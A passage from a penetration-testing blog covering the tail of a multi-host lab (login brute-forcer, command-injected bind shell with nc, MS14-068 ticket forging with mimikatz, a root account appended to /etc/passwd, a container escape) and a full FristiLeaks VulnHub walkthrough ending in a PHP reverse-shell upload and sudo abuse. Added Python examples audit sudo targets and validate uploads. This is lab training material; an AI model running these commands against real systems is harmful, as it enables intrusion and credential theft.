                    sys.exit(1)

                # Wait for the username prompt, then send the username
                # (the newline read from the wordlist is what the service expects)
                read_until(s, b"Enter login: ")
                s.send(user.encode())

                # Wait for the password prompt, then send the password
                read_until(s, b"Enter password: ")
                s.send(password.encode())

                # Answer: anything that is not "Error!" means a valid pair
                answer = s.recv(6)
                if b"Error!" not in answer:
                    print("[BINGO!]\nUsername: " + user + "Password: " + password)
                    sys.exit(0)

                s.close()

I uploaded it to the SSH box with top_shortlist.txt as the user list and john.txt as the password list (I had to remove a blank line with nano to get the script to work). After some time I got the credentials:

admin:macintosh

So I logged in and this is what I got:

Select option:
    1. First script
    2. Second script
    3.Third script

To exit type -1.
Option: 

It seemed like a command injection vulnerability; after some tries I typed:

1|nc -lvp 1234 -e /bin/bash

Then I opened another SSH session and I connected to the shell:

nc -v 192.168.0.6 1234

To find the token:

find / -name "*token*" 2>/dev/null

Then I found it:

/var/opt/token.txt

WIN-TERM

First of all I created an SSH proxy and I configured proxychains locally:

ssh -D 8080 e.lindsey@192.168.101.9

Then I connected to the Windows machine with rdesktop:

rdesktop -r disk:share=/home/reversebrain/share 192.168.0.3

After some tries I found the credentials (default password complexity):

GDS-OFFICE\e.lindsey
Lindsey123

On the desktop there were two icons, TrueCrypt and KeePass, so I thought I had to mount the hidden volume and then open the KeePass database. I found a privilege escalation exploit, so I downloaded it and copied it into /home/reversebrain/share so I could transfer it to the Windows machine’s Desktop from the Network panel. Then I opened cmd and typed:

cd Desktop
powershell -ExecutionPolicy Bypass
Import-Module .\exploit.ps1
Invoke-MS16-032

Now I had an elevated prompt. I changed directory to C:\Users\Administrator\Desktop, listed the files and found automount.bat. I executed it and the TrueCrypt volume was mounted. Then I opened KeePass, opened mywork_gds.kbdx from the TrueCrypt volume and, when prompted for a password, selected the key file mywork_gds.key. There I got the token from the General tab, and the rross cloud credentials:

rross:wwDr6rte

WIN-DC0

Now I needed to exploit the Domain Controller. After some research I found a good YouTube video. From the exploited Windows machine I typed:

net user /Domain

I discovered the domain:

WIN-DC0.gds-office.lab

Now get the SID:

wmic useraccount where name="e.lindsey" get sid

This is the output:

SID
S-1-5-21-421115581-889488229-2938181853-1131

Then I switched to the Kali box and downloaded pykek. Then I typed:

sudo proxychains python ms14-068.py -u e.lindsey@gds-office.lab -p Lindsey123 -s S-1-5-21-421115581-889488229-2938181853-1131 -d 192.168.0.2

Then I uploaded mimikatz to the Windows machine, opened cmd, changed directory to the mimikatz folder and typed:

klist purge
mimikatz.exe "Kerberos::ptc TGT_e.lindsey@gds-office.lab.ccache"

Now the ticket is injected! Let’s mount the C drive:

net use \\WIN-DC0.gds-office.lab\admin$
net use K: \\WIN-DC0.gds-office.lab\C$

Having mounted the C drive of WIN-DC0, I browsed to K:\Users\Administrator\Documents and found token.txt.

CLOUD

Do you remember the rross credentials? I connected to SSH as e.lindsey, then I typed:

ssh rross@172.16.0.3 -p 2222

I spent a lot of time here and discovered that there are 5 LXC containers; we need to connect to lxc1 to perform a privilege escalation. So log in a few times as rross from SSH until you get the lxc1 hostname. Now I needed to escalate privileges. Check which files we can execute with root privileges:

sudo -l

This is the output:

Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh

There is a script that can be executed with root privileges. Let’s check if we can write to it:

ls -l /opt/scripts/clear_nginx_logs.sh

The output:

-rwxrwxrwx 1 root root 46 Dec  9 13:30 /opt/scripts/clear_nginx_logs.sh

Wow! I could write to it. From my local box I generated a password hash:

openssl passwd -1 -salt xyz admin

Now I edited the script and I added the following line:

echo "reversebrain:\$1\$xyz\$R7n0ak3ptkexFwuStJOw9/:0:0:reversebrain:/root:/bin/bash" >> /etc/passwd

Execute it:

sudo /opt/scripts/clear_nginx_logs.sh

Now login as root:

su reversebrain
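
The root cause here is a NOPASSWD sudo target that is world-writable: whoever can edit the script runs as root. The Python below is an added defensive example, not code from the lab or from the original post. It parses `sudo -l` output (the lxc1 output quoted above, embedded as a constructed sample) and reports every target that is group- or world-writable, not owned by root, or missing. The `audit_with_mode` helper stats a temporary file chmod'ed to the mode in question in place of the real /opt/scripts path, so the demo runs anywhere.

```python
import os
import re
import stat
import tempfile

# Constructed sample: the `sudo -l` output for rross on lxc1, as quoted in the writeup
SUDO_L_OUTPUT = r"""Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh
"""

# One command line of `sudo -l`: "(runas) [TAG: ...] /absolute/path [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")


def parse_sudo_rules(text):
    """Extract runas user, NOPASSWD flag and command path from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        rules.append({"runas": m.group("runas").strip(),
                      "nopasswd": "NOPASSWD" in tags,
                      "cmd": m.group("cmd")})
    return rules


def file_findings(path):
    """Why a sudo target is unsafe: anyone who can write it runs as the runas user."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_uid != 0:
        reasons.append("non-root-owner")
    return reasons


def audit(rules, resolve=lambda p: p):
    """Return [(cmd, reasons)] for every rule whose target is writable, not root-owned
    or missing. `resolve` maps the sudoers path to the path to stat (the demo points
    it at a temporary file)."""
    findings = []
    for rule in rules:
        path = resolve(rule["cmd"])
        if not os.path.exists(path):
            findings.append((rule["cmd"], ["missing-target"]))
            continue
        reasons = file_findings(path)
        if reasons:
            findings.append((rule["cmd"], reasons))
    return findings


def audit_with_mode(mode):
    """Demo: audit the sample rules against a temporary file chmod'ed to `mode`,
    returning that target's reasons list (empty when nothing is wrong)."""
    with tempfile.NamedTemporaryFile() as tmp:
        os.chmod(tmp.name, mode)
        findings = audit(parse_sudo_rules(SUDO_L_OUTPUT), resolve=lambda _p: tmp.name)
    return findings[0][1] if findings else []


if __name__ == "__main__":
    print(parse_sudo_rules(SUDO_L_OUTPUT))
    print("0777 ->", audit_with_mode(0o777))  # the lab's misconfiguration
    print("0755 ->", audit_with_mode(0o755))  # how the script should have been installed
```

Run the audit as each sudo-enabled user on a host (it only needs `sudo -l` and `stat`). A clean result still assumes the script's parent directories are root-owned and not writable, and that the script itself does not source or execute anything the caller controls; those checks are the natural next additions.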

Now I needed to escape from the LXC container; I found an interesting PDF. On page 16 there was an exploit written in C, which I copied and pasted into /tmp. Now compile it (remember to add a ; after return 0):

gcc -g -Wall secopenchroot.c -o secopenchroot

Then execute it:

chmod +x secopenchroot
./secopenchroot /tmp "02 00 00 00 00 00 00 00"

Then I cd’d to /root and got the last token!


[VULNHUB] FristiLeaks: 1.3

Second VM of my OSCP series. It is really really awesome.

DIRECTORY NAME TOO MUCH GUESSABLE

Start with an nmap scan:

nmap 192.168.1.23 -sV -p 1-65535 -T 4

This is the result:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 12:45 CET
Nmap scan report for 192.168.1.23
Host is up (0.012s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.59 seconds

So there is only a web server running on port 80. Now let’s scan the service with nikto:

nikto -h 192.168.1.23

This is the output:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-11-24 12:45:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 19:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2016-11-24 12:46:36 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So there are a few entries in /robots.txt that I needed to check. The home page of the web site is the welcome page of the VM. So I opened the robots.txt file:

User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

I checked these three directories, but in each of them there was an image saying it wasn’t the directory I was looking for. I tried some bruteforce attacks for directory discovery without success, then I tried guessing some names and /fristi worked! A login form appeared, and I checked the source code, where I found this comment:

TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Also there was a meta tag with the following phrase:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

OK, there is some information to discover here. Looking more carefully at the source code I found this:

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Let’s decode that. First of all I saved the string into a file called base64_password, then I had to remove the newlines from it and decode it, so I typed:

tr -d '\n' < base64_password | base64 -d > decoded_password

I didn’t know which type of file I had decoded, whether it was text or an image, so I checked it with file:

file decoded_password

This is the output:

decoded_password: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced

Nice, now rename it adding the .png extension. This is the content of the image:

keKkeKKeKKeKkEkkEk

So I had the password but I needed a username. I remembered that the comment in the HTML page was signed by a user, eezeepz. So I tried to log in with these credentials and it worked. Then I clicked on the only link in the page, which redirected me to an upload form.

FIX THIS UPLOAD FORM

Only images were allowed. So I used Burp Suite to upload a .php reverse shell: I changed the extension to .php.gif, edited the Content-Type to image/gif and finally added the GIF89a; header. This was the output of the upload form:

Uploading, please wait
The file has been uploaded to /uploads

So I started listening locally:

nc -lvp 1234

And then I browsed to http://192.168.1.23/fristi/uploads/php-reverse-shell.php.gif. Now I had a reverse shell and needed to elevate my privileges to become root.
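
The upload form accepted the .php.gif file because it trusted three things the client controls: the file name, the Content-Type header and the first bytes of the body. The Python below is an added defensive example, not the VM’s code: it validates an upload the way the form should have, with a single extension from an allowlist, magic bytes that match that extension, a consistent Content-Type, a scan for embedded script tags, and a server-generated storage name. The sample inputs are constructed to mirror the trick described above: a minimal genuine GIF and a GIF89a header followed by a PHP tag.

```python
import re
import secrets

# Allowed final extensions and the magic bytes each must start with
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
CONTENT_TYPES = {"gif": "image/gif", "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg"}

# Constructed samples: a real 1x1 GIF (header, logical screen descriptor, trailer) and
# the writeup's polyglot, a GIF89a header glued in front of PHP
MINIMAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00" + b";"
POLYGLOT = b"GIF89a;<?php /* webshell body omitted */ ?>"


def validate_upload(filename, content_type, data):
    """Return (accepted, reason, stored_name). Checks run cheapest-first; every one of
    them would have rejected the .php.gif upload for a different reason."""
    name = filename.rsplit("/", 1)[-1].lower()  # drop any path component
    if name.count(".") != 1:
        return (False, "double or missing extension", None)  # kills name.php.gif
    _base, ext = name.split(".")
    if ext not in ALLOWED:
        return (False, "extension not allowed", None)
    if not data.startswith(ALLOWED[ext]):
        return (False, "magic bytes do not match extension", None)
    if content_type != CONTENT_TYPES[ext]:
        return (False, "content-type mismatch", None)  # header is client-supplied: a consistency check only
    if re.search(rb"<\?php|<\?=|<script", data, re.IGNORECASE):
        return (False, "embedded script tag", None)  # defence in depth, not the primary control
    stored = secrets.token_hex(8) + "." + ext  # never reuse the client's name on disk
    return (True, "ok", stored)


if __name__ == "__main__":
    print(validate_upload("photo.gif", "image/gif", MINIMAL_GIF))
    print(validate_upload("php-reverse-shell.php.gif", "image/gif", POLYGLOT))
    print(validate_upload("shell.gif", "image/gif", POLYGLOT))
```

Even with all of these checks in place, the upload directory must be served without a PHP handler (or from outside the web root), because a genuine image can still carry script in its metadata; on this VM the decisive mistake was letting Apache execute anything under /uploads at all.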

FRISTI, I PWN YOU!

First of all I ran the command id to check who I was (the apache user), then I started to look around. Browsing /var/www I found notes.txt:

hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

Then I changed directory to /home and I discovered three users:
– admin
– eezeepz
– fristigod

I could only read the eezeepz home folder, so I listed the files inside it:

drwx---r-x. 5 eezeepz eezeepz  12K Nov 18  2015 .
drwxr-xr-x. 5 root    root    4.0K Nov 19  2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .Old
-rw-r--r--. 1 eezeepz eezeepz   18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz  176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz  124 Sep 22  2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24K Nov 17  2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6.9K Nov 17  2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56K Nov 17  2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52K Nov 17  2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  32K Nov 17  2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48K Nov 17  2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53K Nov 17  2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 127K Nov 17  2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38K Nov 17  2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5.3K Nov 17  2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41K Nov 17  2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz  15K Nov 17  2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44K Nov 17  2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7.8K Nov 17  2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz  17K Nov 17  2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  33K Nov 17  2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 168K Nov 17  2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5.4K Nov 17  2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 121K Nov 17  2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25K Nov 17  2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4.7K Nov 17  2015 nologin
-r--r--r--. 1 eezeepz eezeepz  514 Nov 18  2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 382K Nov 17  2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 244K Nov 17  2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51K Nov 17  2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  13K Nov 17  2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21K Nov 17  2015 true
-rwxr-xr-x. 1 eezeepz eezeepz  35K Nov 17  2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  16K Nov 17  2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12K Nov 17  2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 493K Nov 17  2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  14K Nov 17  2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   62 Nov 17  2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47K Nov 17  2015 zic

There was a notes.txt so I read it:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Nice! The chmod binary was present in /home/admin, so I typed:

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis

After a minute I had access to the admin folder, so I changed directory to it and listed the files:

-rwxr-xr-x 1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x 1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r-- 1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r-- 1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r-- 1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x 1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x 1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x 1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x 1 admin     admin      85304 Nov 18  2015 ps
-rw-rw-rw- 1 apache    apache        35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

There were a lot of interesting files. I printed them to the terminal; this is cryptedpass.txt:

mVGZ3O3omkJLmy2pcuTq

This is cryptpass.py (the original is Python 2; shown here in a Python 3 compatible form with comments):

# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64, codecs, sys

def encodeString(s):
    # base64-encode the input, reverse the result, then apply ROT13
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult = encodeString(sys.argv[1])
print(cryptoResult)

And then whoisyourgodnow.txt:

=RFn0AKnlMHMPIzpyuTI0ITG

Analyzing the Python script I can see that the input string is first encoded in base64, then reversed and finally encoded with ROT13. Decoding means applying the inverse steps in reverse order. So I opened the Python interpreter in my terminal and typed:

import base64, codecs
enc = 'mVGZ3O3omkJLmy2pcuTq'
s = codecs.decode(enc, 'rot13')    # undo ROT13 (ROT13 is its own inverse)
s = s[::-1]                         # undo the reversal
s = base64.b64decode(s).decode()   # undo base64
print(s)

That was the output:

thisisalsopw123

I did the same with the second encoded string and got:

LetThereBeFristi!
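As an added example (not code from the writeup or from the box), here is a Python 3 re-implementation of the cryptpass.py scheme together with its inverse, checked against both values found on the box. The point for a defender is that there is no key anywhere in the scheme: anyone who can read the script can recover every "encrypted" password.

```python
import base64
import codecs


def crypt_pass(plaintext: str) -> str:
    """Re-implementation of the cryptpass.py scheme: base64, reverse, ROT13."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decrypt_pass(token: str) -> str:
    """Invert crypt_pass: undo ROT13, undo the reversal, undo base64.
    No key is involved, so possession of the script is enough to invert it."""
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two tokens found on the box (cryptedpass.txt and whoisyourgodnow.txt)
# paired with the plaintexts the writeup recovered.
FOUND = {
    "mVGZ3O3omkJLmy2pcuTq": "thisisalsopw123",
    "=RFn0AKnlMHMPIzpyuTI0ITG": "LetThereBeFristi!",
}


def check_all() -> bool:
    """Decode every token and verify the encoder round-trips the plaintext."""
    for token, expected in FOUND.items():
        plain = decrypt_pass(token)
        if plain != expected or crypt_pass(plain) != token:
            return False
    return True


if __name__ == "__main__":
    for token in FOUND:
        print(token, "->", decrypt_pass(token))
    print("round-trip ok:", check_all())
```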

Ok, so I tried to change user to fristigod but I received the following error:

standard in must be a tty

So I needed a TTY shell. I used Python to get one:

python -c 'import pty; pty.spawn("/bin/bash")'

Then I changed the user with:

su fristigod

I used LetThereBeFristi! as the password and it worked. Then I looked for programs that the user could run with sudo:

sudo -l

And I discovered this:

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

It seems there is a hidden directory with a strange binary. I changed directory to /var/fristigod and listed the files:

-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  3 fristigod fristigod 4.0K Nov 23 14:55 .secret_admin_stuff

Let’s take a look into .bash_history:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Ok, it seems that doCom executes commands as root, but I need to run it as the user fristi. So I went into the .secret_admin_stuff directory and typed:

sudo -u fristi ./doCom chmod -R 777 /root

I used LetThereBeFristi! as the sudo password. Now I had full access to the /root directory. I browsed into it, listed the files and printed fristileaks_secrets.txt to the terminal:

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

VM rooted and completed!

[VULNHUB] FristiLeaks: 1.3